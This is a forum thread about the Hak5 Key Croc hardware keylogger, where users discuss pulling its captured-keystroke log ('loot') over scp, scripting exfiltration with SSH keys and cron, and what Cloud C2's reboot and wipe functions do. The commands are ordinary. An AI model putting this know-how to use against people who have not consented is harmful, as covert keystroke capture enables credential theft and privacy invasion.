Can I copy the croc_char.log file over SSH when the Key Croc is in Attack mode?

[Ughcomeon]

Since I cant get my 2nd key croc to function correct with Cloud C2, can I copy the croc_char.log file over SSH when the Key Croc is in Attack mode (without causing any issues)?

I'd like to use this command from my laptop on the same network -- 

Example - scp remote_username@10.10.0.2:/remote/file.txt /local/directory

Modified for my setup - scp root@192.168.0.101:/root/loot/croc_char.log /home/Croc1

This appears to work but reading the info here -  https://docs.hak5.org/hc/en-us/articles/360048188173-Understanding-the-Key-Croc-file-system

I'm not sure its a best practice?

[chrizree]

There might be some risk involved, but I wouldn't be that worried if it was me doing it. That is based on the fact that the scp operation involves reading (and not writing) to the Croc file system. Writing to the Croc udisk in attack mode is something I wouldn't do (even though I admit I've done it on several occasions when altering payloads and using RELOAD_PAYLOADS).

[Ughcomeon]

Is there a better way to exfil the file? (Again I'd love to use my Cloud C2 setup but that's not working). Is there a list of commands I can run when SSH'ed into the croc?

I believe the issue with my 2nd croc and Cloud C2 has to do with the setup file coming from the Cloud C2.  I tested my "bad" croc (named KC2) with the Device_config file from my good croc (named KC1) and it works as long as it's the only one on the network.  

[chrizree]

Do you mean to "exfil" loot to some other place than C2 then? You could just scp files to some device/server that has sshd enabled and use keys instead of password login. It gets more "scriptable" that way. Run it using cron perhaps.

[Ughcomeon]

The scp command (scp root@192.168.0.101:/root/loot/croc_char.log /home/Croc1 ) is working for me.   Although I do see some weird things happening, like my croc_char.log file getting reset.  For example, when I setup my key croc, I pulled the file down 6 times over a few hours.  Each time the data was increasing (more typing) which is what you would expect.  Then something happened and the last time I pulled it down the file only had the first few lines.  As if the file was over written with a very early version of itself.  It could have been unplugged and reconnected but I don't think it was. 

The commands I'm looking for are the buttons used in the Cloud C2 interface,  "Reboot" and "Wipe".  Are these commands that can be run on the croc SSH'ed in?  I know I can run reboot from the command line and that seemed to work but I'm not sure what's really happening during that process (other than a simple reboot).  Is the "Wipe" button just a script that runs rm (remove / delete) on a few files on the croc?  Is the exfil function in C2 just a copy command or is it stopping the key croc, syncing files then moving them to my server.  I'm just trying to match some of the functions.

[chrizree]

I haven't "deep dived" into the Croc from those aspects so I'm not sure exactly how it works, but as I see it you should be in control of your own loot. In that sense it doesn't seems logic that the Croc should just start over whenever it feels to do so.

Since C2 is "cloaked" (and I have no plans on trying to reverse engineer it), it's difficult to tell exactly what's going on when doing a wipe. It's possible to check the file system on the Croc and make a "before and after" comparison. However, my guess is that it wipes all that is user created, i.e. loot. If you know what you want to wipe, it's possible to do so using ssh (not tried it on the Croc specifically though). This goes for rebooting as well. You can add commands to a ssh connect command on a remote host and they will execute on the remote device (in this case the Croc). For example; ssh root@[croc_address] 'ls -l'